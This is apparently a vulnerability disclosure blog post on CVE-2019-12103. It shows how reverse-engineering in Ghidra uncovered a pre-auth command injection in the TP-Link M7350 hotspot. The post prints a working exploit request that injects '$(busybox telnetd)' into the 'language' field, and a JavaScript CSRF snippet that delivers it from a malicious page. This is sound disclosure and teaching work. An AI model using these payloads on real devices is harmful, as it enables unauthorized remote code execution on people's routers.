CVE-2019-12103 – Analysis of a Pre-Auth RCE on the TP-Link M7350, with Ghidra!

Related services
Related blogs

TL;DR

The TP-Link M7350 (V3) is affected by a pre-authentication (CVE-2019-12103), and a few post-authentication (CVE-2019-12104) command injection vulnerabilities. These injections can be exploited remotely, if the attacker is on the same LAN or otherwise able to get access to the router web interface. CVE-2019-12103 can also be exploited in any browser by cross-site request forgery (CSRF), since there’s no CSRF protection before the user logs in.

If you’re running one of these devices, update now to the new firmware (version 190531).

Also TP-Link are a massive chore to get in contact with. It took three tries at their vulnerability reporting contact form to get a response.

Anyway, this post is technical – about finding issues like this using Ghidra. Because reverse-engineering to find command injection bugs is fun!

Most routers are pretty bad at security

Most consumer-grade networking hardware comes with an embedded webserver. Web servers are a really easy way for users to access configuration on the device, with a GUI, without having to install proprietary software. A lot of the time, the webserver exposes some kind of API endpoint – sometimes JSON or XML. This webserver API, more often than not, is just a thin wrapper around shell commands which alter system-level functionality. The variables passed to the webserver API are just being handed to a shell command. Because most consumer-grade networking hardware is just running Linux.

When developers haven’t been very, very careful – you’ll find some kind of arbitrary command execution potential. I’ve very rarely seen routers which don’t have command injection or memory management problems *somewhere* on an exposed interface.

So, here’s the story of finding one quite convenient command injection in the TP-Link M7350.

The M7350. What’s it running?

As “Lightning” as they claim it to be, the M7350 is just another Qualcomm-based cellular hotspot – in this case it’s running off a (relatively ancient at this point) MDM9225. It’s boxy, quite nice to look at, feels quite solid, and works as well as any other cheapish cellular hotspot. So, it’s fine. Generic.

From our perspective, we want to see what the thing is running, so we can try to find bugs. Luckily, the firmware can be found on the TP-Link website.

I’m running an M7350 with the hardware version 3.0, so my firmware file was called M7350(EU)_V3_160330_1472438334613t.zip. This file itself is just a ZIP, which contains PDF install instructions and, err, another ZIP called M7350(EU) 3.0_1.1.1 Build 160330 Rel.1002n_User.zip.zip. Inside THAT ZIP, we find this:

This looks very much like a zero-attempt-at-obfuscation-or-encryption firmware update file. For some flavour of Android. Which is good for us, because we can just pull binaries that look interesting out and start analysing them. We can even see the firmware update script, at META-INF/com/google/android/updater-script.

We’ve already written about attacking devices by using Android update packages here. But that’s a bit outside of the scope of this particular hunt – we want bugs in the web interface!

So, first, how can we figure out which binaries are interesting to us?

grep, baby

We can figure out some key variables we might have control over, and grep for them. Probably 90% of my Windows Subsystem for Linux use is grep. I hate findstr. grep is amazing.

Anyway, from some generic use of the M7350 webserver through Burp, we can see some variable names, which might help us find the binaries which process them.

Generic configuration requests are sent to the /cgi-bin/qcmap_web_cgi endpoint. The POST body is JSON-encoded. Post-authentication requests require a “token” value. The “module” parameter is interesting, because it suggests that there will be a big switch case running somewhere, which handles input data differently based on which module is being requested.

So, let’s grep for “webServer” and see where it turns up.

$ grep -ro webServer

Binary file data/bin/QCMAP_Web_CLIENT matches
system/WEBSERVER/www/browserWarning.html:webServer
Binary file system/WEBSERVER/www/cgi-bin/qcmap_web_cgi matches
system/WEBSERVER/www/login.min.js:webServer
system/WEBSERVER/www/settings.min.js:webServer
system/WEBSERVER/www/settings.min.js:webServer
system/WEBSERVER/www/tpweb.min.js:webServer
system/WEBSERVER/www/tpwebPhone.min.js:webServer
system/WEBSERVER/www/tpwebPhone.min.js:webServer
system/WEBSERVER/www/tpwebPhone.min.js:webServer
system/WEBSERVER/www/tpwebPhone.min.js:webServer

To avoid extraneous garbage output, especially on the long, linebreak-free JavaScript files, I passed the -o flag. This only shows the string we actually grepped for if it’s found in a text file. We’re only interested in binary files anyway. The -r tells grep to grep recursively, from the current working directory onwards. grep grep grep. I love to grep.

“webServer” appears in the QCMAP_Web_CLIENT and qcmap_web_cgi binaries. Let’s have a look at the qcmap_web_cgi binary first. If you remember from the POST request above, qcmap_web_cgi is the endpoint everything is being POSTed to. So it’ll likely be in charge of managing how each request is handled.

Ghidra is quite good for this

Why not learn basic Ghidra while we’re at it? Once we’ve opened up the qcmap_web_cgi binary and run the generic analysis, we can start off by searching for strings (by clicking Search -> For Strings).

After clicking through the search dialog, leaving the default settings, we can start to see lots of strings – including our “webServer” string.

Double-clicking that entry takes us to where “webServer” is located in memory. Ghidra helpfully notes that this address is cross-referenced elsewhere in the binary (with the XREF note).

We can double-click that cross-reference and it’ll take us to the function that “webServer” is referenced in. I’ve renamed it already here – but it’d usually be called something generic like FUN_00008ce0. I imagine FUN stands for “function” rather than just “fun”. Although reverse-engineering is “fun”, most of the time I wouldn’t call it “FUN”.

Ghidra’s decompiler is quite good (we’ll get to that later), so we can really easily see what the logic of this function is.

A string is passed to the function, it returns 1 if the string is “webServer”. Easy.

Then, we can follow this function backwards, to figure out how it gets called and why. Right-click the function name in the disassembly view (doesn’t work in the decompiler view for, I imagine, sensible reasons I don’t understand). Then click through References -> Show Call Trees.

This will give a really simple expandable bullet-point list of where the function’s getting called from – and what it’s calling.

On the left, you can see the incoming references – webServer_or_status is being called by FUN_00008d78, which is itself called by main (and, before that, the ELF entry). On the right, the outgoing calls show webserver_or_Status is only calling strcmp.

We can then start poking around functions, focussing only on those which might do something interesting with the input we give them.

Quick spoiler – FUN_00008d78 is really boring for our purposes. It’s mainly there to pull data out of the environmental variables, pull stuff out of the JSON and perform authentication checks where appropriate.

So, let’s have a look at the main function.

So, this is the part of main that calls FUN_00008d78 – one level up from webServer_or_status. All the other if/else chunks are error handling – there to throw errors if the request is badly-formed or incomplete. This highlighted chunk of code does all the heavy lifting for valid requests.

You’ll notice that FUN_00008d78 doesn’t return anything. And then FUN_000092ec gets called.

Let the FUN begin

FUN_000092ec is actually quite interesting. Even from the call tree, you can see it calls other functions which open sockets, and do sendto, and recv calls. Also at least one system call.

You might expect something like this from a webserver-adjacent binary – but remember that the HTTP server socket activity isn’t being handled by this binary at all. This binary isn’t the webserver itself – it’s just an endpoint that the actual webserver will pass the HTTP request to. Any socket activity is doing something else entirely. Something which makes our RE journey a bit longer, but perhaps interesting.

Ok, back to the binary. As you can see in the call tree, FUN_000092ec is calling FUN_00008f3c which is doing socket, system and sendto syscalls! Let’s look at that (with a little bit of manual variable name clean-up):

The binary is bind’ing to the socket file /www/qcmap_cgi_webclient_file. Then it’s sendto’ing request data to the socket file /www/qcmap_webclient_cgi_file.

All this means for us is that we now have to expand our search a bit. Since data is being pushed out of the qcmap_web_cgi binary, we need to figure out where it’s going, and what’s happening to it.

I didn’t choose grep. grep chose me

Let’s grep for the qcmap_webclient_cgi_file file. Another process will likely be listening to this file. God I love grep.

$ grep -r qcmap_webclient_cgi_file
Binary file data/bin/QCMAP_Web_CLIENT matches
Binary file system/WEBSERVER/www/cgi-bin/qcmap_web_cgi matches

Only 2 results. Our already-boring qcmap_web_cgi binary, and the now very interesting QCMAP_Web_CLIENT binary. You might remember that from our earlier “webServer” grep.

Once we’ve got it loaded up into Ghidra, we can check for strings again. This time, “webServer” shows up a couple times.

But, this time, clicking through to its address only shows “webServer” floating in a sea of nulls.

No direct cross-references, nothing immediately useful. So, what can we do?

Scroll a bit further down, however, and there’s a few non-null bytes. You can convert these to a dword by right-clicking the first one -> Data -> dword.

This looks very much like a lookup table. If you double-click on the dword 15384h, you’ll find yourself at that offset within the binary. It looks very much like the start of a function. A function which, just by eyeballing, looks like it parses requests to the “webServer” API module.

Can you spot the vulnerability yet? We’ll come back to that in a sec.

You can rename this function by right clicking on FUN_00015384 -> Rename Function. I chose the name API_webServer_function.

If, like me, you want to make sure that that pointer to 0x00015384 in the lookup table actually shows your new function name, you can go back to the pointer, right click it -> References -> Create Memory Reference. To make life easier, once you know the structure of the lookup table, you can just press the “p” key when you’re clicked on the first byte of the dword to convert it to a pointer to a function immediately.

The disassembly view will then show you the function name, rather than just the raw dword. Which is a bit nicer.

If we wanted to be thorough, we could scroll up to what looks like the start of the lookup table, see if it’s referenced in a function, and see what that function does.

Scrolling up to what looks like the start of the lookup table is the string “lan”. This is referenced by a function I’ve renamed “parse_json”.

The parse_json function is pretty big, but the point it references the “lan” string shows how it’s using this lookup table.

This do/while loop grabs the module name from the request JSON (every single loop iteration, for some reason), and – starting from the address of “lan” – cycles through each relative offset in increments of 0x44. Each loop, it strcmp‘s the user-supplied string passed to the “module” parameter with the string at the start of each entry in the lookup table until it matches. Then it calls the related function. I doubt this looks anything like the lookup function the developers actually wrote – but this is how it looks in the decompiled pseudocode.

Oh yeah, back to the bug hunting

Bit of a generic RE distraction there. Anyway, back in the API_webServer_function, the Ghidra decompiler has prepared a really nice switch statement for us to peruse.

The user-supplied “action” value from the JSON request is extracted (from iVar1 + 0x14), and the switch runs based on what its value is.

So, if we sent a request containing something like {“module”:”webServer”, “action”:0}, the QCMAP_Web_CLIENT process would call the function call_popen, with the argument “uci get webserver.user_config.language”. Then it creates a JSON object, and returns the value it got from call_popen as the “language” value.

call_popen is a name I gave the function myself. It’s just a thin wrapper around the popen syscall, with a bit of error checking and return value handling. Here is it in full:

The popen call itself is highlighted.

Grand popening, grand closing

popen literally runs system-level commands. It’s much like system, or exec*. It’s not ideal to pass untrusted user input straight to it. But that’s exactly what this binary does.

If the action is 1, then the value of the “language” parameter is passed to a shell command string constructed by that snprintf function, which is then passed to call_popen.

“BUT DAVE” – I hear you all say in unison – “WHERE’S THOSE ADDITIONAL ARGUMENTS TO SNPRINTF?”

That’s really astute and observant of you. Clever you. Well, the answer is, the decompiler isn’t perfect. We’d expect to see:

snprintf(char_array_204,200,”uci set webserver.user_config.language=%s;uci commit webserver”, *(iVar1 + 0x10));

But we don’t. But we DO know that it SHOULD say that. Here’s how we know.

Function calls in ARM

Function calls in ARM are similar to x86_64, in that arguments are stored in registers. R0 should contain the first argument, R1 the second, R2 the third – etc etc.

We’re looking at a snprintf call, which should take at least 4 arguments if there’s some format string to fill. And that %s in the “uci set…” command string is definitely a format string.

snprintf should be called in the following format:

int snprintf ( char * s, size_t n, const char * format, … );

The trailing … are for any number of pointers to strings which will populate any equal number of format strings in the 3^rd “format” char array. Seeing as we have a definite format string in there, we would expect R0, R1, R2 AND R3 to contain the arguments for this function call.

In fact, we can SEE, WITH OUR OWN EYES, IN THE DISASSEMBLY, that R3 – the register we’d expect to have a pointer to the user-controlled “language” parameter value – is being set. Let’s follow how that happens.

First the return value from cJSON_GetObjectItem is moved to R6 (the return value is stored in R0, but is noted as “language_val” here because I renamed it in the decompiler view).

Yes, I know that’s a SUBtract instruction, but sometimes in ARM disassembly you’ll see varieties of ADD or SUB with zero values instead of a MOV. SUBS R6, R0, #0x0 substitutes nothing from R0 before putting it into R6. It’s essentially just a MOV. With a KEY DIFFERENCE.

The fact that it’s a “SUBS” rather than just a “SUB” means that the condition flags are updated depending on the result of the operation. Therefore, if the SUBS instruction results in R6 being equal to zero, then the zero flag (ZF) will be set to 1, and the next BEQ branch command will be followed.

So there’s a lot going on in just a couple of instructions.

We can see that in the pseudocode as well:

iVar1 != 0 checks for a null return value.

Back to the assembly. The pointer to the object returned from the cJSON_GetObjectItem call has been moved to R6. Then, the value at the memory referenced by the pointer + 0x10 is moved to R3. Then a CMP instruction checks if it’s null.

We can make an educated guess, by reading other parts of the pseudocode, that the offset 0x10 of the object returned from cJSON_GetObjectItem contains a pointer to the user-supplied string value. Then there’s a quick CMP to make sure the pointer isn’t null. Again, we can see that reflected in the pseudocode:

But, for some reason, the Ghidra decompiler doesn’t take into account the fact that R3 is still populated, even after the CMP, and doesn’t include it in the pseudocode. Oh well. At least we know for sure it’s there now.

That bug, yes, sorry, back to that

It should be self-evident by now – but setting the “language” to a shell command will result in our shell command being literally included in the “uci set…” string by snprintf. And when that string is passed to popen, that command will be executed.

We know now that the pseudocode should really read something like this:

So the value we supply to the “language” parameter replaces the %s format string in the “uci set…” string. That value gets stored at acStack224. Then popen gets called on it.

So, the following request will spawn telnetd. Pre-authentication.

POST /cgi-bin/qcmap_web_cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/settings.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 65
Connection: close

{"module":"webServer","action":1,"language":"$(busybox telnetd)"}

Ta-daa. We can then go on to log into the device, and plunder it for any kind of

So what? Another LAN-only RCE?

Well, not entirely. Cellular modems connect to APNs. APNs are like massive LANs, provided by a telecoms company. APNs can be configured badly – for instance by not implementing client segregation. In those cases, anyone *quite* naughty connected to the same APN as you might be able to access the web configuration interface of your cellular modem. Anyone *extremely* naughty with access to the telco GGSN would also likely be able to attach to the web interface of the router – assuming the router doesn’t block access over the cellular interface.

There’s also the possibility of drive-by JavaScript cross-site request forgery attacks. It’s really easy, in JavaScript, to enumerate where the router is, see if it’s potentially vulnerable, and forge requests to it which might execute code. You can see an example of this kind of attack on one of our older posts. So, a nasty page can execute arbitrary code on your router. You don’t have to do anything except visit an entirely unrelated, but malicious page.

Here’s the JavaScript which will inject a command, wait 500ms, and set it the language back to normal:

function sleep(ms) {
return new Promise(resolve => setTimeout(resolve, ms));
}
function inject(lang){
var xhr = new XMLHttpRequest();
var url = "http://192.168.0.1/cgi-bin/qcmap_web_cgi";
xhr.open("POST", url, true);
xhr.send(JSON.stringify({"module":"webServer","action":1,"language":lang}));
}

inject("$(busybox telnetd)");
sleep(500).then(() => {
inject("en");

});

The fix

TP-Link fixed this issue in firmware update 190531. What was the fix?

Single-quote escaping the format string. Clever.

Conclusions

Bugs in cellular modems are still really common. This was an example of only one of the bugs we found in the M7350. To be fair, I only spent a day or so on it all given. So, there may well be more less obvious issues. And there may well be more in other TP-Link devices. Happy hunting!

TP-Link’s Response

It took three attempts via TP-Link’s vulnerability reporting form for them to get back to me. Not good. Here’s the timeline:

26/02/2019 – First contact attempt.
02/03/2019 – Second contact attempt.
12/03/2019 – Third contact attempt.
18/03/2019 – TP-Link finally reply.
18/03/2019 – Sent details of one command injection issue.
02/04/2019 – TP-Link confirms receipt of email.
18/04/2019 – TP-Link confirms issue exists, states they’re working on a fix.
18/04/2019 – TP-Link provides beta firmware for testing.
25/04/2019 – I find time to look at this firmware, find another bug.
29/04/2019 – TP-Link provides another updated firmware which fixes this 2^nd bug.
14/04/2019 – I find a bit more time to look again at this firmware, confirm fix.
03/06/2019 – TP-Link release firmware version 190531

TP-Link have said that this issue only affects M7350 hardware version 3. I’m not entirely sure if this is true. I’m never convinced by companies which fix issues reactively, piecemeal, rather than proactively. I always hope that, on receipt of a command injection vulnerability report, they’ll give their entire codebase some kind of audit for other, extremely similar issues, but I guess TP-Link don’t.